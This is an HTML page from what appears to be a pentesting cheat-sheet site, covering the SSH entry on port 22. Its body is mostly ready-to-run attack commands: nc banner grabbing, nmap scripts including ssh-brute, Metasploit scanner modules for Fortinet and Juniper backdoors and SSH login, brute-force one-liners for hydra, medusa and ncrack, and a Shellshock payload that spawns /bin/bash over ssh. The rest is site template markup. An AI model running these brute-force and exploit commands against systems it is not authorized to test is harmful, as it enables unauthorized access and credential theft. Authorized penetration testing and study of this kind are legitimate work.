<!DOCTYPE HTML>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover" />
<title>Noobs Survivial Guide</title>
<link rel="stylesheet" type="text/css" href="styles/style.css">
<link rel="stylesheet" type="text/css" href="fonts/css/fontawesome-all.min.css">
<link rel="stylesheet" type="text/css" href="styles/framework.css">
<link rel="stylesheet" type="text/css" href="styles/atom-one-dark.css">
<link href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i|Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i" rel="stylesheet">

</head>
<body>
    
<div id="page-transitions" class="page-build light-skin highlight-blue">    
    <link rel="stylesheet" type="text/css" href="styles/framework-news.css">
    <div id="menu-hider"></div>
    
    <div id="menu-list" data-selected="menu-pages" data-load="menu-list.html" data-height="415" class="menu-box menu-load menu-bottom"></div>    
    <div id="menu-demo" data-load="menu-demo.html" data-height="210" class="menu-box menu-load menu-bottom"></div>

    <div class="header header-scroll-effect">
        <div class="header-line-1 header-hidden header-logo-app">
            <a href="#" class="back-button header-logo-title">Back to Ports</a>
            <a href="#" data-menu="sidebar-left-over" class="back-button header-icon header-icon-1"><i class="fa fa-angle-left"></i></a>
            <a href="#" data-menu="menu-favorites" class="header-icon header-icon-2"><i class="fa fa-star color-yellow-dark"></i></a>
            <a href="#" data-menu="menu-list" class="header-icon header-icon-4"><i class="fa fa-bars"></i></a>
            <a href="#" data-menu="menu-demo" class="header-icon header-icon-3"><i class="fa fa-cog"></i></a>
        </div>
        <div class="header-line-2 header-scroll-effect">
            <a href="#" class="header-pretitle header-date color-highlight"><!--Date will Appear Here --></a>
            <a href="#" class="header-title font-23">PORT 22: SSH</a>
            <a href="#" data-menu="menu-list" class="header-icon header-icon-1"><i class="fa fa-bars"></i></a>
            <a href="#" data-menu="menu-favorites" class="header-icon header-icon-3"><i class="fa fa-star color-yellow-dark"></i></a>
            <a href="#" data-menu="menu-demo" class="header-icon header-icon-2"><i class="fa fa-cog"></i></a>
        </div>  
    </div>     
	
	<!-- Menu Sidebar Left Over -->
    <!-- Menu Sidebar Left Over -->
    <!-- Menu Sidebar Left Over -->
	
    <div id="sidebar-left-over" 
         data-selected="menu-components" 
         data-title="Most Common Ports" 
         data-subtitle="Port Enumeration" 
         data-load="ports-menu.html" 
         class="menu-box menu-load menu-sidebar-left-over">
    </div>
    
    <div id="menu-favorites" data-height="420" class="menu-box menu-bottom">
        <div class="menu-title">
            <span class="color-highlight">Your Saved Articles</span>
            <h1>Favorites</h1>
            <a href="#" class="menu-hide"><i class="fa fa-times"></i></a>
        </div>
        <div class="content bottom-0">
            <div class="menu-news-item">
                <img src="images/empty.png" data-src="images/pictures/8s.jpg" class="preload-image rounded-image shadow-small" alt="img">
                <strong>Macbooks are Awesome</strong>
                <span>
                    Typewriters are slowly coming back to style.
                </span>
            </div>
            <div class="menu-news-item">
                <img src="images/empty.png" data-src="images/pictures/7s.jpg" class="preload-image rounded-image shadow-small" alt="img">
                <strong>Coffee is a Must</strong>
                <span>
                    A great way to start a day, is a with a coffee!
                </span>
            </div>
            <div class="menu-news-item">
                <img src="images/empty.png" data-src="images/pictures/9s.jpg" class="preload-image rounded-image shadow-small" alt="img">
                <strong>The Most Beautiful Camera</strong>
                <span>
                    The most elegant design a camera has ever had..
                </span>
            </div>
            <a href="#" class="button bg-highlight button-s shadow-small uppercase ultrabold button-full button-rounded top-15">View More Favorites</a>
        </div>
    </div>    
    
	<div class="page-content header-clear-medium">
        
		<div class="article-card">
			<a href="images/ports/ssh.gif" class="article-header shadow-medium">
				<span class="article-overlay"></span>
				<span class="article-image preload-image" data-src-retina="images/ports/ssh.gif" data-src="images/ports/ssh.gif"></span>
				<span class="article-time color-gray-light">15th August 2019<i class="fas fa-clock opacity-50"></i></span>
			</a>
			<div class="article-content">
			  <h1 class="article-title top-15 bold">Unless you get a MOTD or a broken sshd version, you are SOOL and this is likely just a secondary access point once you break something else.</h1>
			  <p class="bottom-30">SSH is such an old and fundamental technology so most modern version are quite hardened however we can still try some things and maybe get lucky. </p>			
			</div>
		</div>
                
		<div class="content reading-time-box">
			<h2 class="bolder uppercase">SSH Enumeration</h2>
			<h4 class="color-gray-dark font-12 bottom-30">By <a href="#" class="color-highlight">darktrance21</a>  - <span class="reading-time color-highlight"></span> Minutes - <span class="reading-words color-highlight"></span> Words.</h4>
			<h4 class="uppercase bolder">Banner Grabbing</h4>
			<pre><code class="bash">nc 192.168.0.106 22</code></pre>
			<br>
			<h4 class="uppercase bolder">Nmap scripts</h4>
			<pre><code class="perl">nmap -p 22 -n -v -sV -Pn --script ssh-auth-methods --script-args ssh.user=root 10.10.10.91
nmap -p 22 -n -v -sV -Pn --script ssh-hostkey 10.10.10.91
nmap -p 22 -n -v -sV -Pn --script ssh-brute --script-args userdb=user_list.txt,passdb=password_list.txt 192.168.1.97
nmap --script=ssh2-enum-algos,ssh-hostkey,sshv1.nse 192.168.13.234 </code></pre>
			<br>
			<h4 class="uppercase bolder">Metasploit Modules</h4>
			<pre><code class="perl">use auxiliary/scanner/ssh/fortinet_backdoor
use auxiliary/scanner/ssh/juniper_backdoor
use auxiliary/scanner/ssh/ssh_enumusers
use auxiliary/scanner/ssh/ssh_identify_pubkeys
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ssh/ssh_login_pubkey
use auxiliary/scanner/ssh/ssh_version</code></pre>
			<br>
			<h4 class="uppercase bolder">Bruteforcing SSH</h4>
			<pre><code class="bash">hydra -l username -P password_list.txt 192.168.168.168 -f -v ssh</code></pre>
			<pre><code class="bash">medusa -u root -P 500-worst-passwords.txt -h 192.218.8.3 -M ssh</code></pre>
			<pre><code class="bash">ncrack -p 22 --user webadmin -P /usr/share/seclists/Passwords/Common-Credentials/500-worst-passwords.txt 192.10.210.3</code></pre>
			<br>
			<h4 class="uppercase bolder">Shell Shock</h4>
			<pre><code class="bash">ssh username@IPADDRESS '() { :;}; /bin/bash'</code></pre>
			<br>
			<h4 class="uppercase bolder">SSH Scan Script</h4>
			<a href="#" data-menu="menu-list-bottom" class="button shadow-medium button-rounded button-full button-dark-3d button-dark uppercase ultrabold">SSH Scan Script</a>
			<br>
			<h4 class="uppercase bolder">SSH User Enum Script</h4>
			<a href="#" data-menu="menu-list-bottom" class="button shadow-medium button-rounded button-full button-dark-3d button-dark uppercase ultrabold">SSH User Enum Script</a>
		</div>
		
    <!-- Menu Bottom -->
    <!-- Menu Bottom -->
    <!-- Menu Bottom -->
        
    <div id="menu-list-bottom" 
         data-selected="menu-components" 
         data-title="sshenum.py" 
         data-subtitle="a little python magic" 
         data-load="ssh-script2.html"
         data-height="420"
         class="menu-box menu-load menu-bottom">
    </div>

	<!-- Menu Sidebar Left Over -->
    <!-- Menu Sidebar Left Over -->
    <!-- Menu Sidebar Left Over -->
	
    <div id="sidebar-left-over" 
         data-selected="menu-components" 
         data-title="Most Common Ports" 
         data-subtitle="Port Enumeration" 
         data-load="ports-menu.html" 
         class="menu-box menu-load menu-sidebar-left-over">
    </div>
		
        <div class="footer">
            <a href="#" class="footer-logo"></a>
            <p class="footer-text">There's nothing that comes close to Noobs Survivial Guide<br> It's the best One-Stop research reference for pen-testers on the web</p>
            <div class="footer-socials">
                <a href="#" class="scale-hover icon icon-round no-border icon-xs bg-github border-teal-3d"><i class="fab fa-github"></i></a>
                <a href="#" class="scale-hover icon icon-round no-border icon-xs bg-bitbucket"><i class="fab fa-bitbucket"></i></a>
                <a href="#" class="scale-hover icon icon-round no-border icon-xs bg-google"><i class="fab fa-google-plus-g"></i></a>
                <a href="#" class="scale-hover icon icon-round no-border icon-xs bg-phone"><i class="fa fa-phone"></i></a>
                <a href="#" data-menu="menu-share" class="scale-hover icon icon-round no-border icon-xs bg-teal-dark"><i class="fa fa-retweet font-15"></i></a>
                <a href="#" class="scale-hover icon icon-round no-border icon-xs back-to-top bg-blue-dark"><i class="fa fa-angle-up font-16"></i></a>
            </div>
            <p class="footer-copyright">Copyright &copy; Enabled <span id="copyright-year">2017</span>. All Rights Reserved.</p>
        </div>
    </div>
    <a href="#" class="back-to-top-badge back-to-top-small bg-highlight"><i class="fa fa-angle-up"></i>Back to Top</a>
    <div id="menu-share" data-height="420" class="menu-box menu-bottom">
        <div class="menu-title">
            <span class="color-highlight">Just tap to share</span>
            <h1>Sharing is Caring</h1>
            <a href="#" class="menu-hide"><i class="fa fa-times"></i></a>
        </div>
        <div class="sheet-share-list">
            <a href="#" class="shareToGithub"><i class="fab fa-github bg-github"></i><span>Github</span><i class="fa fa-angle-right"></i></a>
            <a href="#" class="shareToTwitter"><i class="fab fa-twitter bg-bitbucket"></i><span>Bitbucket</span><i class="fa fa-angle-right"></i></a>
            <a href="#" class="shareToLinkedIn"><i class="fab fa-linkedin-in bg-linkedin"></i><span>LinkedIn</span><i class="fa fa-angle-right"></i></a>
            <a href="#" class="shareToGooglePlus"><i class="fab fa-google-plus-g bg-google"></i><span>Google +</span><i class="fa fa-angle-right"></i></a>
            <a href="#" class="shareToPinterest"><i class="fab fa-pinterest-p bg-pinterest"></i><span>Pinterest</span><i class="fa fa-angle-right"></i></a>
            <a href="#" class="shareToWhatsApp"><i class="fab fa-whatsapp bg-whatsapp"></i><span>WhatsApp</span><i class="fa fa-angle-right"></i></a>
            <a href="#" class="shareToMail no-border bottom-5"><i class="fas fa-envelope bg-mail"></i><span>Email</span><i class="fa fa-angle-right"></i></a>
        </div>
    </div>
</div>      
	

<script type="text/javascript" src="scripts/jquery.js"></script>
<script type="text/javascript" src="scripts/plugins.js"></script>
<script type="text/javascript" src="scripts/custom.js"></script>
<script type="text/javascript" src="scripts/highlight.pack.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
</body>
</html>